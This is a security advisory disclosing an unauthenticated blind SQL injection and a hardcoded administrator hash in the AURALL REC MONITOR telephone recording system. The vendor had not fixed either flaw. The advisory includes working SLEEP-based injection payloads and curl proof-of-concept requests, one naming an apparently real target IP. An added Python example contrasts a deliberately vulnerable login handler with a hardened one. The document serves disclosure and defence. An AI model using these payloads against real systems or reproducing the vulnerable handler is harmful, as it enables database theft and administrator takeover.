Trustwave SpiderLabs Security Advisory TWSL2021-007:
Multiple Vulnerabilities in AURALL REC MONITOR

Published: 04/21/2021
Version: 1.1

Vendor: VOID Sistemas (https://www.void.es)
Product: AURALL REC MONITOR
Version affected: 9.0.0.1

Product description:
Telephone Recording System
AURALL is a computer system based on open architecture PC for recording, storage in database, administration and management of telephone conversations made through telephone channels, radio channels or extensions of telephone exchanges. Using AURALL, you can (through the power of a relational database server, the SQL language and the computer applications that connect to this database) obtain all the necessary features to store conversations, perform searches, play back recordings, add labels to them, export the audio to a sound file to be handled externally (send by e-mail, play it in another system) or use the additional fields to store extra information.

Finding 1: Blind time-based SQL Injection.
*****
Credit: Andreas Georgiou of Trustwave SpiderLabs (@superhedgy)
CVE: CVE-2021-25899
CWE: CWE-89

Description of Finding:
This is an instance of "blind" SQL Injection, meaning that the application does not return significant data during the attack. This makes exploitation more difficult, but still possible. For example, data can be inferred one bit at a time based on subtle differences in the server's response, or even in the amount of time taken by the server to generate a response. By exploiting this vulnerability it was possible to exfiltrate the contents of the underlying database management system.
Payload Details:
---
Location: https:///AurallRECMonitor/services/svc-login.php
HTTP Method: POST
Authentication: Not Required
Vulnerable Parameter: param1
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: param1=dummy' AND (SELECT 1 FROM (SELECT(SLEEP(5)))dummy)-- dummy&param2=test
Sample POST Body: param1=dummy'+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))dummy)--+dummy%26param2%3dtest&param2=test
---

Evidence 1.1:
Please note this is a time-based exploit. The following request and response pairs are a Proof of Concept (PoC) of SQL queries executed on the database management system.

$ curl -i -s -k -X $'POST' -H $'Host: xxx.xxx.xxx.xxx' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:83.0) Gecko/20100101 Firefox/83.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'X-Requested-With: XMLHttpRequest' -H $'Content-Length: 38' -H $'Origin: https://xxx.xxx.xxx.x78' -H $'Connection: close' -H $'Referer: https://xxx.xxx.xxx.xxx/AurallRECMonitor/login.php' -H $'Cookie: PHPSESSID=mfhpg5af2jf8b21c0fc573dmkf' -b $'PHPSESSID=mfhpg5af2jf8b21c0fc573dmkf' --data-binary $'param1=vulnrable_parameter&param2=test' $'https://xxx.xxx.xxx.xxx/AurallRECMonitor/services/svc-login.php' ; echo -e "\n\n"

HTTP/1.1 200 OK
Date: Wed, 02 Dec 2020 17:49:18 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.4.11
X-Powered-By: PHP/7.4.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 27
Connection: close
Content-Type: text/html; charset=UTF-8

Evidence 1.2:
Raw HTTP evidence showing a PoC payload executed on the AURALL server.
$ curl -i -s -k -X $'POST' \
> -H $'Host: xxx.xxx.xxx.xxx' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:83.0) Gecko/20100101 Firefox/83.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'X-Requested-With: XMLHttpRequest' -H $'Content-Length: 51' -H $'Origin: https://xxx.xxx.xxx.xxx' -H $'Connection: close' -H $'Referer: https://xxx.xxx.xx.xxx/AurallRECMonitor/login.php' -H $'Cookie: PHPSESSID=mfhpg5af2jf8b21c0fc573dmkf' \
> -b $'PHPSESSID=mfhpg5af2jf8b21c0fc573dmkf' \
> --data-binary $'param1=admin\'%2b(select(sleep(10)))%2b\'&param2=test' \
> $'https://195.53.213.178/AurallRECMonitor/services/svc-login.php'

HTTP/1.1 200 OK
Date: Wed, 02 Dec 2020 18:07:36 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.4.11
X-Powered-By: PHP/7.4.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 63
Connection: close
Content-Type: text/html; charset=UTF-8

Finding 2: Hardcoded Credentials in the source code.
*****
Credit: Andreas Georgiou of Trustwave SpiderLabs (@superhedgy)
CVE: CVE-2021-25898
CWE: CWE-798

Description of Finding:
SpiderLabs discovered passwords stored in unencrypted source code text files. This was noted when accessing the source code of the 'svc-login.php' file. The hardcoded hash value is used to authenticate a high-privileged administrator with the web application.

Evidence 2.1:
The web application compares the submitted user/password pair with the SHA256 hash value hardcoded in the source code.

Remediation Steps:
No fix is available for these vulnerabilities. To limit exposure, the application should only be accessible on the local network. Additionally, it is highly recommended that the administrator set up proper network segmentation and ensure that only authorized personnel have access, through the use of Access Control Lists.
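To make the two root causes concrete for anyone reviewing similar login code, the following is an added example and not the vendor's svc-login.php or any Trustwave code. It models a login handler in the shape the advisory describes (a query built by string concatenation, plus a hardcoded admin hash that short-circuits the database check) next to a hardened handler that uses a parameterised query and per-user salted PBKDF2 hashes compared in constant time. An in-memory SQLite database stands in for the MySQL backend, the user accounts and the admin secret are constructed values, and the injection string is the exact payload quoted in the advisory's Payload Details. SQLite has no SLEEP() function, which turns out to be useful: the vulnerable handler fails with "no such function: SLEEP", proving the payload reached the SQL parser as code, while the hardened handler treats the same string as an ordinary (non-existent) username.

```python
"""
Added example (not the AURALL vendor's code): a login handler with the two
reported weaknesses beside a hardened one. SQLite stands in for MySQL.
"""
import hashlib
import hmac
import os
import sqlite3

# Exact injection string from the advisory's "Payload Details" section.
ADVISORY_PAYLOAD = "dummy' AND (SELECT 1 FROM (SELECT(SLEEP(5)))dummy)-- dummy"

# Constructed stand-in for the hardcoded, unsalted SHA-256 hash noted in
# Finding 2. The real value from svc-login.php is not reproduced here.
HARDCODED_ADMIN_SHA256 = hashlib.sha256(b"constructed-admin-secret").hexdigest()

PBKDF2_ITERATIONS = 200_000


def _pbkdf2(password: str, salt: bytes) -> bytes:
    """Salted, iterated hash suitable for stored credentials."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)


def make_db() -> sqlite3.Connection:
    """In-memory users table holding one constructed account ('operator')."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, salt BLOB, pw_hash BLOB)")
    salt = os.urandom(16)
    conn.execute("INSERT INTO users VALUES (?, ?, ?)",
                 ("operator", salt, _pbkdf2("operator-pass", salt)))
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Mirrors the reported pattern; do not use.

    1. A hardcoded hash grants the administrator without touching the DB (CWE-798).
    2. The username is concatenated straight into the SQL text (CWE-89), so
       the advisory payload is parsed as SQL rather than compared as data.
    """
    if username == "admin" and hashlib.sha256(password.encode()).hexdigest() == HARDCODED_ADMIN_SHA256:
        return True
    sql = "SELECT username FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchone() is not None


def login_hardened(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Parameterised lookup plus constant-time check of a per-user salted hash.

    No account is special-cased in code: the administrator is just another
    row in the users table with its own salt and hash.
    """
    row = conn.execute("SELECT salt, pw_hash FROM users WHERE username = ?",
                       (username,)).fetchone()
    if row is None:
        _pbkdf2(password, b"\x00" * 16)  # burn the same time for unknown users
        return False
    salt, stored = row
    return hmac.compare_digest(_pbkdf2(password, salt), stored)


def probe(conn, handler, username: str, password: str):
    """Run a handler and report ("ok", result) or ("error", message)."""
    try:
        return ("ok", handler(conn, username, password))
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, payload:", probe(db, login_vulnerable, ADVISORY_PAYLOAD, "x"))
    print("hardened,   payload:", probe(db, login_hardened, ADVISORY_PAYLOAD, "x"))
    print("hardened,   good creds:", login_hardened(db, "operator", "operator-pass"))
```

Against a real MySQL backend the concatenated query would not error but would stall for the SLEEP() duration, which is exactly the timing side channel the advisory describes; the parameterised version is unaffected because the driver sends the username as a bound value, never as query text. The hardened handler also removes the second finding: replacing the in-code SHA-256 constant with a stored, salted, iterated hash means an administrator credential can be rotated without shipping new source.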
Revision History:
12/02/2020 - Vendor contacted with no response
12/15/2020 - Vendor contacted with no response
01/08/2021 - Vendor contacted with no response
04/21/2021 - Advisory published

About Trustwave:
Trustwave helps businesses fight cybercrime, protect data and reduce security risk. With cloud and managed security services, integrated technologies and a team of security experts, ethical hackers and researchers, Trustwave enables businesses to transform the way they manage their information security and compliance programs. More than three million businesses are enrolled in the Trustwave TrustKeeper® cloud platform, through which Trustwave delivers automated, efficient and cost-effective threat, vulnerability and compliance management. Trustwave is headquartered in Chicago, with customers in 96 countries. For more information about Trustwave, visit https://www.trustwave.com.

About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs

Disclaimer:
The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.